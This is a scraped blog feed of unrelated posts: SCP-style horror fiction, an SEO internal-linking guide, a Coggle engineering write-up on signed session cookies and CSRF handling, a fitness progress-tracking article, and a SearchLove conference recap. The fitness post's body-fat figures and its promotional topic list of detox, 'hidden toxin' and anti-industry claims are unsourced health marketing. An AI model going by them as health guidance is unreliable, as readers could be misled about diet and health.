Adding on from the last entry. I'm… I'm not sure how my biology will react in such a low Hume concentration, actually. I mostly worked with higher than average Hume Fields, and the reality benders we tested never had a Field lower than 0.8. This… this is gonna be a first. An all-time first. I remember Site-133's "Prommel Killer", they called it that because it broke the previous theory about the lowest limit of Hume concentration. Really expensive, really weird machine that brought down a small area to 0.4. 0.05 is… yeah.
I was lying. I was lying, last log… I… I'm lying to myself. My own body, and… little red here too… We're about the realest things in this place. And that means… over time… the Hume field's going to want to… equalize, and… I'm… I'm gonna go for now, I have some… some calculation to do again. Red, Anna, take note I'm using Kejel's Second, Third, and Fourth Laws, got it? Use… use 0.05 as the surrounding, my external field as… somewhere in between 1 and 1.4, use the Second Law's error estimation correction, and my internal as… as… as… shit. I'm not done yet.
I am real. I am super-real. Super duper real. Ultra real, the realest guy in a world of no-real.
You have no sense of humor as usual, red. I'm talking about the LSS, red. When we got sent here, I think… I think our reality got cranked up a notch. Red, didn't you pay attention in class? Hey, don't get fucking smart with me, red. Okay, the point is, the LSS surge got us up to… to…
Two months, eighteen days, seven hours.
No, red, not even fucking close, you must've converted Kejel's Third Law equation wrong. Because of the malfunctioning LSS we got blasted by, we're somewhere in between 2.2 and 3.6. Yes, that's good red, that's very good, because that means we have more time than we thought to… to… yes, red, before we fucking DIE, okay?!
Two months, twenty four days, five hours.
About three years. Four, if… If I don't interact too much. If… If I had had an LSS here, I could maybe stretch it out to… eight, maybe, that's best case scenario… But I have… I have to… I… know… but… but… three years. Three years, then it's past the point of no return. Ha. Hahahahaha. I should… I should definitely figure something out by then. I think I still should be pretty good for a while… At least… no, no, I won't be in here that long… I'll definitely figure something out…
Anna, what would we do with a case like this? I need your help, honey. That… that tingling I've been feeling… That's my Hume Field diffusing… My… my reality fading… Three years. I need to stabilize myself within three years.
I've been thinking… Anna and I, we had this theory… Even though the Hume Field is low, it's still a Hume Field. And precisely since it's so low, Hume diffusion should take quite a while. Now if… if I could… contain… recycle the fields, keep the diffusion from spreading too thin, I could… And I could also maybe… it's only a theory, but… It's worth a shot. But that means…
Hey, red. I… I'm gonna have to go for a bit. I want to test something, and you can't come with me. I… I'm sorry. No, no, red, I'm really, really sorry, I want you to come, I do, but… if we're together the diffusion will increase faster… We both need as much time as possible. I need to figure this place out more, and you need to make sure you keep all that info in your head. It's… red, come on. You- you'll be fine red, I know you will, you're tough. A lot tougher than me… it'll only be for a bit, red, but I need to see if I can find a way to keep us alive a bit longer. Maybe even get us out of here. If I can contain enough field, I can… I can maybe even get us out. No, no I'm not sure, but I need to find out. Red, we're talking about possibly escaping, okay? Yeah, it's a gap. A gap should have an end, like a… like the walls of a canyon, understand? I need to find a wall, and then, and then I can…
I'm sorry, red, I hope we're still friends when I come back.
I'm… I'm going now… I'll see you soon.
- Close.
Six months, ten days, five hours.
Hello again, little red. It's been a while.
You know… thinking back… I don't know what the hell I was so excited about. This place is… god, this place. This place is is fucking… hell.
There's no end. It just goes on. And on. And on.
I traveled in one goddamn direction for two, damn, months. God, I'm so fucking stupid, why did I think I could get out? I'm thinking like those old European shits that thought the end of the world was at the horizon. Fucking stupid, Robert, stupid, just-just- GAAAAAAAAAAAH—
If I let myself fall down long enough would I eventually hit a bottom?
Ten months, 28 days, 15 hours.
There's no bottom. And fuck you, red.
I'm sorry, red, don't go out, I'm sorry I turned you off, come back, come back, please—
… I turned 40 today. Happy birthday, Robert.
I was adopted, did you know that? Yeah, my parents left me in a box on the side of a street. Got picked up by some American couple, which explains my not-so-Chinese names. I don't even know my original last name. Just thought I'd share. How about you, red?
Anna and I met on-site in 1988. God she was beautiful. She still is. It was our eyes. She has beautiful eyes. My eyes are grey, they're boring, but hers… God they're beautiful. Do you think… Do you think she's still worried about me, little red? Is she looking for me?
You know, red, you're a great listener. But I never hear you talk about yourself. Come on, don't be shy, there's no one else around, right? Hahaha, right? Hahaha… hahahahaha…
"I'm sorry, Robert, I'm afraid I can't do that." Hahaha, red, you're hilarious.
Were you married? Kids? Any family at all? Girlfriend? Boyfriend? Come on, red, I won't judge, just… talk to me, please. God, my head hurts. And my feet feel like they've been asleep for forever.
I worked at a comic store as a kid. So much cheaper back then, and I got free stuff at the end of each week. I liked Spiderman the best.
I was in a box, side of the street.
I… what the fuck… no. No. No, no, no, no, no, no, red, have you seen my picture? The picture red, Anna's picture, where is - come on, come on, where-where- Anna! ANNA! ANNA! Where did - no, no, no, no, no, please, please no, anything but, PLEASE.
It's fading, she's fading, she's fading, please, Anna, no, please, come on, sweetie, stay here, it's too soon, it's TOO SOON, my math isn't wrong, it's NOT WRONG, YOU SHOULD BE FINE. ANNA, ANNA, I can't hold you, come back, Anna, sweetie, honey, Anna please, I need you, I need you, please, please, don't go, I'm here, I'm still here. RED GET HELP. Anna, please, please, don't go, don't -
Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. [Dr. Scranton repeats this for three hours.]
Anna and I got married in '91. We couldn't really get the nicest suit and dress we wanted because of work, but, damn, we both looked great. Anna looked better, of course. We just danced, and danced the whole night, got the whole week off. Even a job like mine lets you enjoy your honeymoon… So, come on red, open up, put 'er there, high five. Come on. Come on, red.
One year, two months, twenty-seven days.
AAAAAAA—
[The next recordings only play the control panel's automated voice giving times, with intervals of one to three days, with several month-long gaps in between as well; also intermixed are Dr. Scranton's sobbing, screaming, and mumbling. These recordings continue until the time reading reaches two years, seven months, and 28 days, after which they cease to pick up any sound until two months later.]
6 notes · View notes
website-packages · 4 years
Link
FastandSocial.com - 15 important tactics of Internal Linking - https://fastandsocial.com/15-important-tactics-of-internal-linking/Every website owner is fighting to get back links from other websites to increase the PR & ranking on Google search results. But they are not concerned about the internal linking of the site which is also a very important factor in search engine ranking. Let’s first understand the difference betweenEvery website owner is fighting to get back links from other websites to increase the PR & ranking on Google search results. But they are not concerned about the internal linking of the site which is also a very important factor in search engine ranking. Let’s first understand the difference between internal & external linking…… Internal linking is the links on web pages or the website that point to other pages within the same website. External linking is when we put link on one website to another website. Why Internal linking is important? Internal linking is very important for any website as: It increases the accessibility of the website for users & search engines. Search Engines like Google rewards you for doing things that make the website user’s experience easier and better It helps search engines & user to navigate the site easily It is a perfect strategy for giving an extra boost to specific pages for specific keywords It helps search engines to crawl deep web pages which are away from main menu, navigation bar or home page of the website Anchor links helps search engines to co-relate the pages with the overall theme of the website Internal Linking to get the top ranking on Google or Other Search Engines As said above Internal linking is very important but I have seen many websites where every 5th-6th word is linked with other page of the website which actually looks very irritating. We should not mistreat this opportunity as spamming. I have consolidated some best practices of Internal Linking which is good from Search Engines & Users point of view. 1- Utilize every opportunity of effective internal linking like add links in your navigation, header or footer as text links to all your important pages and main sections of the website. 2- Internal page linking thru dynamic drop down menu in DHTML or JavaScript is not a good way of linking as search engines cannot follow links created in JavaScript; they can only follow simple text links. We should use simple text links to link all internal pages of the website. 3- Every page of the website should be maximum 2 clicks away from the home page of the website. E-commerce sites are usually very big in size so in that case search engine might face problem in crawling & indexing all deep level pages without appropriate internal linking. 4- In some times it is not possible to link every page of the website with the main menu or header or footer of the website; in that case internal contextual linking thru web content is a good idea to enhance the accessibility of the site. 5- Try to use relevant keywords as anchor text instead of using “Click here” etc. 6- Always use the same URL when you are linking a specific page. For example, if you want to link your service page (www.example.com/service.html) from other pages of the site then you should always use the same URL. Some people use different URL to link the same page like sometime example.com/service.html & some time www.example.com/service.html, this can create canonicalization issue. 7- Use breadcrumb navigation on sites that will link to other pages often 8- All internal links should work properly. Broken links are not good from both users & search engines perspective. 9- Use site map with all important pages links. It will help search engines & users to search all level web pages. Sitemap is not only effective for SEO, but also has usability benefits. 10- Some web pages may be more popular in the search rankings and receive more links than the rest of your website. You can strengthen these weaker pages by including some contextual links to them from the stronger pages. 11- Check your server logs for 404 errors. fix any broken links and redirect old linked to pages to their new locations 12- Try to use absolute URLs for internal linking as it can help you when you’re reusing content across multiple protocols (such as http and https). Absolute URLs provide you with indirect benefits in unforeseen situations, such as when someone steals your copy and forgets to change the internal links. Absolute URLs also show you exactly where your links lead, whereas links using “…/somewhere.html” structures are ambiguous and, especially in deep-content sites, often cause links to break when pages are moved around. Absolute URLs provides the better control over optimization. 13- Linking page & text should have connection which is actually beneficial for the users. Linking should not be from SE’s point of view. 14- Pages which are not very important from users & search engines point of view should have nofollow attribute while linking with navigational part of the site, because thru linking with those less important pages we are passing our link PRs to pages that aren’t as important. For example: private policy pages, legal terms, thank you pages, shopping carts, sitemap etc. are not very important so we can put a nofollow tag on these pages. You can understand in this way, like you should put nofollow tags on those pages which are not important for (search engine result pages) SERPs as people might not come to your site thru those pages. Basically, every link that you put it, ask yourself “does that page/section need more link weight?”, and if the answer is no, nofollow it. Don’t go overboard though, or else you won’t have any internal links as far as the engines are concerned. 15- Find out a list of pages which are most important for you- from SE’s & Users’ perspective. Try to optimize the internal linking of these pages with appropriate anchor text. If you have several pages for the same product range like in case of e-commerce sites then link the main page to all other pages but you can put nofollow tags on less important pages. Always put a link back from deeper pages to the main page of that specific category. A well structured internal linking pattern will help SE’s to navigate your site in a better way & in longer way it will help you to get sitelinks in Google. I am sure these internal linking techniques will be very helpful in your site optimization in a better manner. Seo Consultants London
0 notes
coggle · 5 years
Text
What We've Learned from Moving to Signed Cookies
We've recently moved Coggle's login sessions from a database-storage model to signed cookies, where session data is stored the session cookie itself.
There aren't many real-world examples of how to handle this migration, so we're sharing what we've learned doing this with node and express, and hopefully it'll be a useful and interesting read!
Part 1: How Old Sessions Worked
Previously we handled sessions with the express-session module and connect-mongo data store, and then we used passport to load our actual user data based on the session. Our middleware setup looked like this:
const session = require('express-session'); const MongoStore = require("connect-mongo")(session); const sessionStore = new MongoStore({ ... }); // loads req.session from the database store, if the request included a valid session cookie app.use(session({store: sessionStore, ...})); // passport middleware loads req.user from our users collection based on the user ID stored in the session app.use(passport.initialize()); app.use(passport.session()); // csrfMiddleware saves a CSRF token in the session app.use(csrfMiddleware);
For each request that included a session cookie, the process was basically:
Check the connect-mongo sessions collection in the database to see if the cookie is valid
If it's valid, load the session data (the user ID and anti-CSRF token) from the sessions collection
Passport middleware loads req.user based on the user ID
Our actual app logic runs
Finally, if the session is updated (for example the cookie expiry is extended), re-save the session to the database. (express-session does this when the response is sent by hooking the response object)
The corresponding data for every single session cookie that hadn't expired had to be saved in the database. This added up to a lot of session records!
Before the migration sessions were the biggest cause of writes to our database, a significant source of reads, and the majority of data we actually stored in our main database (The actual content of Coggle diagrams is stored separately). Our goal with moving to signed sessions is to significantly reduce the resources needed to host this.
Part of the reason for the volume of session data is that we have very long-lived session cookies, as we prioritise people being able to easily return to their Coggle diagrams. People forgetting which email address they used to log in and 'losing' their diagrams as a result is our biggest source of support requests.
Part 2: Choosing a Signed Cookie Implementation
An alternative to storing sessions in the database is to instead store the session data in the cookie itself, so when each page is loaded the session data needed is immediately available in the cookies of the request. This is possible as long as there's a cryptographic signature on the cookie to stop it from being tampered with. Someone can't change their cookie to log in to someone elses account, as they have no way to forge the cryptographic signature.
There isn't a formal standard for signing cookies, but the most common approach is to store a second cookie alongside each cookie to be signed, with a .sig extension to the name. This is the approach used by the cookies npm module, and the cookie-session middleware wraps this module into a convenient middleware which initialises req.session if the session cookie's signature is valid.
We already use JSON Web Tokens in Coggle for authentication between our back-end services, so we also considered using JWTs as session cookie values. There would be a number of advantages/disadvantages to this:
Public-keys could be used for signing, enabling our back-end services to verify signatures without access to the private signing key
Cookie values could be easily encrypted, as well as signed, by using the related JWE standard.
The additional information that makes JWTs portable (key ID, issuer, and using public-key signatures) also makes them bigger
Public-key signatures are significantly more expensive to sign and verify.
There are no readily available open source node modules for JWT-based session cookies.
Since we don't need encryption and would prefer to use symmetric keys, we chose the cookie-session middleware. If you're considering the same route, then think carefully about whether all of the data stored in your session should be unencrypted.
Part 3: Implementation
Secure Configuration:
The default for cookie-session (inherited from the cookies module), is to use the SHA1-HMAC signing algorithm. SHA1 has some weaknesses, so to be cautious we use SHA256-HMAC instead by passing our own Keygrip instance when creating the session middleware:
const signingKeys = new Keygrip([superSecretKey, ...], 'sha256'); const cookieSessionMiddleware = cookieSession({ name: 'session-cookie', keys: signingKeys, maxAge: Session_Duration, httpOnly: true, sameSite: 'lax', signed: true, secure: true, });
Handling CSRF:
We set SameSite=Lax on our session cookies, so it would not normally be possible for code on other sites to send potentially state-changing POST requests with the session cookie. However, in case people are using old browsers which do not support SameSite, or there is a bug in browser's implementation, we still also use an anti-CSRF token for state changing requests.
Previously the CSRF token for each session was stored in the database, and the value sent with each request from the client compared against this - with signed cookies it's instead stored in the cookie itself.
As the session cookie is stored as a HTTPOnly cookie, it is not possible for a CSRF script to read the value, even though it exists on the client.
It might be possible for malicious javascript to overwrite the HTTPOnly cookie, but in that case the cookie signature would be invalid.
This CSRF protection set-up is definitely a compromise, but as Coggle isn't handling payments, we think it's reasonable.
Migrating Old Sessions
It's important to migrate existing sessions so we don't log out users - running both the express-session and cookie-session middleware simultaneously isn't possible, as they both hook req.session and the response object.
As a result, we had to extract the logic from express-session which actually reads and verifies cookies (the getcookie function), and manually check the connect-mongo store, which is relatively straightforward:
const session = require('express-session'); // just for passing to connect-mongo, not used as middleware! const MongoStore = require("connect-mongo")(session); const legacySessionStore = new MongoStore({ ... }); const loadLegacySession = function(req, callback){ const session_id = getcookie(req, legacyCookieName, [legacyCookieSecret]) if(session_id){ legacySessionStore.get(session_id, function(err, session){ return callback(err, session_id, session); }); }else{ return callback(null, null, null); } };
With this in place, the final middleware for migrating sessions is straightforward. The migration is only temporary - once all old sessions have expired, we'll be able to just use the new cookieSessionMiddleware directly instead.
const sessionMiddleware = function(req, res, next){ // first delegate to the new session middleware: cookieSessionMiddleware(req, res, function(err){ if(err) return next(err); // then, ONLY IF there's no user ID in the new style // session, try to load one from the legacy session // so we can migrate it: if(!(req.session && req.session.passport && req.session.passport.user)){ loadLegacySession(req, function(err, legacySessionID, legacySession){ if(err) return next(err); // if there was a passport user ID in the old // session, migrate it: if(legacySession && legacySession.passport && legacySession.passport.user){ req.session.passport = {user:legacySession.passport.user}; // also migrate any existing CSRF token, so // CSRF tokens used in pages which are already // open remain valid: if(legacySession._csrf){ req.session.csrf = legacySession._csrf; } } // delete the old session: if(legacySessionID){ deleteLegacySession(legacySessionID, req, res); } return next(); }); }else{ // if we have an authed session from the new cookie // already then we're done: return next(); } }); });
After this, the passport middleware works exactly the same as before, loading req.user from session.passport.user
Part 4: The Results!
We deployed the new sessions around January 27th. Based on one week either side of that, we saw some dramatic differences:
Database update operations, and corresponding db journal data, were reduced by approximately 80%, from 0.4MB/s to 0.08MB/s
Tumblr media Tumblr media
Database volume busy time (which previously limited our peak scaling), reduced from approximately 15% to approximately 3%. In theory we can now handle peaks of over 30x our normal traffic volume, instead of peaks of only 7x!
Tumblr media
(The reduction in the read ops of two of the volumes is primarily because they were being used as syncing sources for our off-site replicas - less journal data means less to be read for syncing)
And finally, 311 GB of session data and corresponding indexes can eventually be dropped from our database (multiplied across replicas, that's over 1.5TB of disk space, or about $160/month)
Hopefully this has been an interesting read. If you thought we were crazy to store our sessions in MongoDB in the first place, well, we also used to store the entire contents of Coggle documents in a MongoDB database too... maybe we'll write about that next!
Posted by James, Feb 2020.
0 notes
Text
How To Track Results (And Not Fall Into the Trap That Ruins 95% of Well-Thought Out Diets)
Tumblr media
Whether you're just getting started, or you're a longtime fitness pro, you'll never get the results you're dreaming of if you don't accurately and properly track your progress.
A lot of beginners get discouraged and quit because they're not seeing fast results, or because the scale isn't tipping in their favor.
Similarly, many seasoned gym rats get complacent and stop being as vigilant about tracking their progress because they think they've got their routine down to a science.
Both are doing it wrong.
You see, by consistently tracking your progress, you not only collect important data you can use to steadily make adjustments to your exercise and diet regimens, but you also keep yourself motivated to stay in it to win it.
Here are the best methods for tracking your progress over the long run (try one or more of these methods):
Use the scale wisely. Remember that a scale only gives you a rough estimate of your weight on a daily basis. Depending on your monthly cycle (yes, guys, you have one too) the amount of water your body retains will fluctuate dramatically. So if you're not taking regular readings and averaging them out over weeks and months at a time, you're giving yourself false hope or false terror every time you see a quick drop or spike in your weight. For more accurate results, use a variety of metrics to track your progress over time.
Use a measuring tape. The same as with a scale, this can fluctuate throughout the month.
But it's useful to take a measurement of some key areas of your body once a week and chart how they shrink as you progress. The main areas you should measure (and log in a journal) are your:
Waist
Hips
Thighs
Chest
Arms
Calves
Use calipers or a scientific method of body fat analysis. The main scientific options are bioelectrical impedance scales (somewhat inaccurate), DEXA/BodPod (pricey, but accurate), underwater testing (also pricey, but accurate) readings to measure body fat. As for calipers, make sure you do it yourself or have the same person doing it for you each time (I do it myself every 2 weeks), since variations in grips used for calipers can often cause very inaccurate readings. Bodyfat scales are also notorious for being inaccurate (often as much as 3-5% off), BUT if you use them consistently, you'll get a consistent return. So even if you can't tell what your exact body fat percentage is, you can tell how much of your body fat you've lost so far.
When calculating, bear in mind that an average body fat percentage for women is between 25% and 32%, and for men, it's between 18% and 24%.
Most people who are bodybuilding have lower fat levels than this - to see your abs through your skin, if you're a woman you'll need a body fat percentage just below the range of 11% and 14%, and for a man you'll need a body fat percentage below the range of 10% and 12%.
Just keep in mind that it's unhealthy to have too low of levels of body fat; at some point, having too little fat on your body can start to powerfully affect some of your body's natural processes.
This is especially dangerous for women of child-bearing age who may become pregnant - if you're going to grow a baby, you need ample fat on your body to be able to nourish that child and eventually produce breast milk for the little tyke.
Here's a quick chart that illustrates body fat percentage ranges for different body types:
Classification
Men                                                                 Women
Do not go lower than:
 4-5%                                                               10-11%
Athletic body
 6-12%                                                             13-19%
Generally fit body
13-17%                                                            20-24%
Average body
18-24%                                                            25-32%
Overweight body
 25%+                                                              33%+
And here's a chart that illustrates healthy/fit body fat percentage ranges based on age:
Age                               Men (Fit/Athletic)                      Women (Fit/Athletic)
18-30 y.o.                      10-18%                                       20-25%
31-50 y.o.                      16-24%                                       22-29%
Over 50 y.o.                  16-29% (Fit to Average)              20-36% (Fit to Average)
If you are over 50 y.o., read this: Men and women over 50 should consult with their doctors about their ideal body fat, because it varies widely depending on the individual and their health. For men, it is usually considered unhealthy (as opposed to not ideal) for men who are 50+ and have average builds to have a body fat percentage below 15% or above 30%. For women, it can sometimes be dangerous for women over 50 to have a body fat percentage of lower than 20% and higher than 36%.
Also, as you age, your muscles and bones naturally lose their density and size. At this time, a higher body fat percentage is not just acceptable, it's actually healthier.
Take a picture in the mirror. You can do this as often or as sparingly as you want, but it can be a great way to measure your progress - and makes for a great mash-up on YouTube or in a slideshow later on. As with any of these methods, if you're hoping to see a huge difference in a week or two, you may be disappointed (though not always!). But, you'll be amazed how different your body looks within a couple of months if you stick to your diet - and you'll be able to see your progress over time in a series of photos, which can be really inspirational!
You'll be able to get within 5% of your percentage, which is ideal for both progress checks and also to fill in the bonus "So Easy A Caveman Can Do It"Calculator so you have the most accurate calorie totals!
Write down your calories. You've got to write down everything -everything - that you eat, at least in the beginning. That means candy bars, beers, that half a slice of cake you had at the office birthday party for Irene on Friday, everything. If you're guessing in the beginning, you don't have an accurate picture, and you're not going to be able to analyze your habits to see where you need to make improvements.
Write down your exercises. You've got to track your strength-training as well as your cardio. A typical exercise journal will contain the exercises you did, how many sets and reps of each and the amount of weight you were throwing around. It should also have a section for each day of exercise - what kind did you do? How many calories did the machine say you burned (or did you calculate that you burned, if you worked out in the great outdoors?) Was it easy, moderate, intense? Keeping an exercise journal is more than an important tool for keeping yourself on the right track, it's also an exercise in honesty and accountability. Are you really squeezing out each of those last reps? Are you flipping back through pages and realizing that you're leaving the gym too early, too often? An exercise journal can tell you not just about how strong you're getting, but how committed you are, as well.
Use an Excel spreadsheet or Microsoft Word table design. As with personal finance, the most popular way to track your fitness progress is with an Excel spreadsheet or Word table. With just a basic knowledge of Excel, you can create graphs, charts and more that will give you a big-picture view of your efforts thus far. When creating a spreadsheet, make sure you have boxes designated for weight, measurements and body fat percentage. Don't lose heart if your numbers aren't moving as quickly as you want them to! You may go a week or two without seeing your weight change, for instance, because you're building muscle and burning fat at the same time - so it's important to know what your measurements and body fat percentage are.
Use a web site or app specifically designed to help you track your progress. There are many of these, running the gamut from highly detailed and useful (a few of them) to mostly bunk (most of them.) It's a shame that the cottage industry that has sprung up around weight-loss since the beginning of the obesity epidemic in the 1990s in America has attracted its fair share of snake-oil salesmen and hucksters. However, there are some very good sites out there that can be very helpful to you as you make your journey toward the body of your dreams. Here are the best websites to track your progress:
FitDay (this is my hands down favorite tracker)
The Daily Plate
Skinnyo
Bodybuilding.com
Use my secret on-the-go tracking "weapon", for times that it's hard/impossible to get online. If I can't access FitDay (or my personal journals at home), I always use one of the following and suggest you do the same:
"Notes" from the iPhone are usually sent automatically to your email address.
Evernote updates automatically and can be accessed from any computer.
The harsh truth is: You can diet and exercise all you want, but if you don't have good, consistent measurements, you'll either burn out or fail to capitalize on opportunities to improve your results over time.
So, follow the suggestions above and/or get right to it with the following steps.
Action Steps:
Hop on Google Images and search "body fat % for (your gender)"
If you have calipers or access to another method, use them to estimate your body fat %
Interested in losing weight? Then click below to see the exact steps I took to lose weight and keep it off for good...
Read the previous article about "Nutrition Basics for Fast Pain Relief (and Weight Loss)"
Read the next article about "Advanced Fat Loss - Calorie Cycling, Carb Cycling and Intermittent Fasting"
Moving forward, there are several other articles/topics I'll share so you can lose weight even faster, and feel great doing it.
Below is a list of these topics and you can use this Table of Contents to jump to the part that interests you the most.
Topic 1: How I Lost 30 Pounds In 90 Days - And How You Can Too
Topic 2: How I Lost Weight By Not Following The Mainstream Media And Health Guru's Advice - Why The Health Industry Is Broken And How We Can Fix It
Topic 3: The #1 Ridiculous Diet Myth Pushed By 95% Of Doctors And "experts" That Is Keeping You From The Body Of Your Dreams
Topic 4: The Dangers of Low-Carb and Other "No Calorie Counting" Diets
Topic 5: Why Red Meat May Be Good For You And Eggs Won't Kill You
Topic 6: Two Critical Hormones That Are Quietly Making Americans Sicker and Heavier Than Ever Before
Topic 7: Everything Popular Is Wrong: The Real Key To Long-Term Weight Loss
Topic 8: Why That New Miracle Diet Isn't So Much of a Miracle After All (And Why You're Guaranteed To Hate Yourself On It Sooner or Later)
Topic 9: A Nutrition Crash Course To Build A Healthy Body and Happy Mind
Topic 10: How Much You Really Need To Eat For Steady Fat Loss (The Truth About Calories and Macronutrients)
Topic 11: The Easy Way To Determining Your Calorie Intake
Topic 12: Calculating A Weight Loss Deficit
Topic 13: How To Determine Your Optimal "Macros" (And How The Skinny On The 3-Phase Extreme Fat Loss Formula)
Topic 14: Two Dangerous "Invisible Thorn" Foods Masquerading as "Heart Healthy Super Nutrients"
Topic 15: The Truth About Whole Grains And Beans: What Traditional Cultures Know About These So-called "Healthy Foods" That Most Americans Don't
Topic 16: The Inflammation-Reducing, Immune-Fortifying Secret of All Long-Living Cultures (This 3-Step Process Can Reduce Chronic Pain and Heal Your Gut in Less Than 24 Hours)
Topic 17: The Foolproof Immune-enhancing Plan That Cleanses And Purifies Your Body, While "patching Up" Holes, Gaps, And Inefficiencies In Your Digestive System (And How To Do It Without Wasting $10+ Per "meal" On Ridiculous Juice Cleanses)
Topic 18: The Great Soy Myth (and The Truth About Soy in Eastern Asia)
Topic 19: How Chemicals In Food Make Us Fat (Plus 10 Banned Chemicals Still in the U.S. Food Supply)
Topic 20: 10 Banned Chemicals Still in the U.S. Food Supply
Topic 21: How To Protect Yourself Against Chronic Inflammation (What Time Magazine Calls A "Secret Killer")
Topic 22: The Truth About Buying Organic: Secrets The Health Food Industry Doesn't Want You To Know
Topic 23: Choosing High Quality Foods
Topic 24: A Recipe For Rapid Aging: The "Hidden" Compounds Stealing Your Youth, Minute by Minute
Topic 25: 7 Steps To Reduce AGEs and Slow Aging
Topic 26: The 10-second Trick That Can Slash Your Risk Of Cardiovascular Mortality By 37% (Most Traditional Cultures Have Done This For Centuries, But The Pharmaceutical Industry Would Be Up In Arms If More Modern-day Americans Knew About It)
Topic 27: How To Clean Up Your Liver and Vital Organs
Topic 28: The Simple Detox 'Cheat Sheet': How To Easily and Properly Cleanse, Nourish, and Rid Your Body of Dangerous Toxins (and Build a Lean Well-Oiled "Machine" in the Process)
Topic 29: How To Deal With the "Stress Hormone" Before It Deals With You
Topic 30: 7 Common Sense Ways to Have Uncommon Peace of Mind (or How To Stop Your "Stress Hormone" In Its Tracks)
Topic 31: How To Sleep Like A Baby (And Wake Up Feeling Like A Boss)
Topic 32: The 8-step Formula That Finally "fixes" Years Of Poor Sleep, Including Trouble Falling Asleep, Staying Asleep, And Waking Up Rested (If You Ever Find Yourself Hitting The Snooze Every Morning Or Dozing Off At Work, These Steps Will Change Your Life Forever)
Topic 33: For Even Better Leg Up And/or See Faster Results In Fixing Years Of Poor Sleep, Including Trouble Falling Asleep, Staying Asleep, And Waking Up Rested, Do The Following:
Topic 34: Solution To Overcoming Your Mental Barriers and Cultivating A Winner's Mentality
Topic 35: Part 1 of 4: Solution To Overcoming Your Mental Barriers and Cultivating A Winner's Mentality
Topic 36: Part 2 of 4: Solution To Overcoming Your Mental Barriers and Cultivating A Winner's Mentality
Topic 37: Part 3 of 4: Solution To Overcoming Your Mental Barriers and Cultivating A Winner's Mentality
Topic 38: Part 4 of 4: Solution To Overcoming Your Mental Barriers and Cultivating A Winner's Mentality
Topic 39: How To Beat Your Mental Roadblocks And Why It Can Be The Difference Between A Happy, Satisfying Life And A Sad, Fearful Existence (These Strategies Will Reduce Stress, Increase Productivity And Show You How To Fulfill All Your Dreams)
Topic 40: Maximum Fat Loss in Minimum Time: The Body Type Solution To Quick, Lasting Results
Topic 41: If You Want Maximum Results In Minimum Time You're Going To Have To Work Out (And Workout Hard, At That)
Topic 42: Food Planning For Maximum Fat Loss In Minimum Time
Topic 43: How To Lose Weight Fast If You're in Chronic Pain
Topic 44: Nutrition Basics for Fast Pain Relief (and Weight Loss)
Topic 45: How To Track Results (And Not Fall Into the Trap That Ruins 95% of Well-Thought Out Diets)
Topic 46: Advanced Fat Loss - Calorie Cycling, Carb Cycling and Intermittent Fasting
Topic 47: Advanced Fat Loss - Part I: Calorie Cycling
Topic 48: Advanced Fat Loss - Part II: Carb Cycling
Topic 49: Advanced Fat Loss - Part III: Intermittent Fasting
Topic 50: Putting It All Together
Learn more by visiting our website here: invigoratenow.com
0 notes
ronijashworth · 5 years
Text
SearchLove London 2019: The Great Big Round Up
On 14th and 15th October, we made our annual visit to The Brewery in London for our UK edition of SearchLove. This year’s conference was our most successful yet, not only in terms of the number of folks attending but also with regard to the high calibre of speakers who joined us over the jam-packed two days to share their invaluable industry insights. 
Let the show begin! #searchlove #seo pic.twitter.com/zDIRbbX2KG
— Udo Leinhäuser (@u_leinhaeuser) October 14, 2019
This post is a quick-fire summary of the knowledge our speakers had to share, plus their slides & a few photos from across the conference.  All sessions in their entirety will be available with a DistilledU membership in a couple of weeks' time. And don’t forget that if you feel you missed out this year,  make sure you sign up to our mailing list to be the first in the know for next year’s conference! Are you ready? Let’s get started!
Marie Haynes - ‘Practical Tips For Improving E-A-T’
Google’s algorithms are increasingly considering E-A-T components (expertise, authority and trust) when evaluating sites. Marie shared why and how to improve E-A-T so that you have the best chance at winning in the current and future search landscape.
One of the most important things to focus on is the accuracy of the information on your site. This is especially important if your pages are primarily YMYL (‘your money or your life’, in other words, content that can affect someone’s health, safety, financial stability, etc.).
Google’s quality raters use the quality raters guidelines as their textbook. If you take a look at the guidelines, you can get a better idea about what Google is actually looking at when they’re evaluating E-A-T components. Try doing a CTRL+F for your industry to see what they suggest for your vertical.
There are some practical things you can do on your site to help Google understand that you’re trustworthy and authoritative:
Have contact information available.
If you’re eCommerce, ensure that your refund policy and customer service information is clearly accessible.
Make sure your site is secure (HTTPS)
Have correct grammar. How your page reads is important!
Make sure that the information on your site doesn’t contradict any known facts, something called scientific consensus. Site all sources as necessary.
SearchLove London 2019 - Marie Haynes - Practical Tips for Improving E-A-T from Distilled
Sarah Gurbach - ‘Using Qualitative Data To Make Human-Centered Decisions’
SEOs have a huge amount of data to work with, but often, the data that gets overlooked is that which comes directly from the humans who are driving all of our data points.
By performing qualitative research in tandem with quantitative, we can get insights on the actual human wants, barriers, and confusions that drive our customers to make their decisions and move through the funnel.
Sarah’s steps to conducting qualitative research include:
Defining your objective. Write it as a question. Keep it specific, focused and simple.
Asking open-ended questions to customers to define the personas you should be targeting. Sarah recommends surveys of 10 questions to 5 customers that should only take around 20 minutes each. More than this will likely be redundant.
Actually observing our users to figure out what and how they’re searching and moving through the funnel.
You can then quantify this data by combining it with other data sources (i.e. PPC data, conversion data, etc.).
If you don’t have time to conduct surveys, then you can go to social media and ask a question!
Want more on questions you can ask your customers? Check out this resource from Sarah.
SearchLove London 2019 - Sarah Gurbach - Using Qualitative Data to Make Human-centered Decisions from Distilled
Greg Gifford - ‘Doc Brown’s Plutonium-Powered SEO Playbook’
Greg delivered an entertaining, informative and best of all highly actionable talk on local SEO. If you have physical locations for your business, you should not be neglecting your local SEO strategy! It’s important to remember that there is a different algorithm for local SEO compared to the traditional SERP, and therefore you need to approach local SEO slightly differently.
Greg’s key tips to nailing your local SEO strategy are as follows:
Links are weighted differently for local SEO! Make sure you acquire local links - quality, and whether these are follow or nofollow, matters far less than in the standard SERP. The key is to make sure your links are local - get your hands dirty with some old-school marketing and get out into your local community to build links from churches, businesses and community websites in your area.  
Content needs to actually be about your business and local area. If you can use your website copy for a site in another area, you’re doing it wrong. Also, make sure that your blog is a local destination - if your content is more localised than competitors, then you’ll be one step ahead of competitors. 
Citations are also important, but you only need a handful! Make sure you link to your website from places that customers will actually see, such as your Facebook, Twitter and other social profiles. Ensure your business information is accurate across platforms.
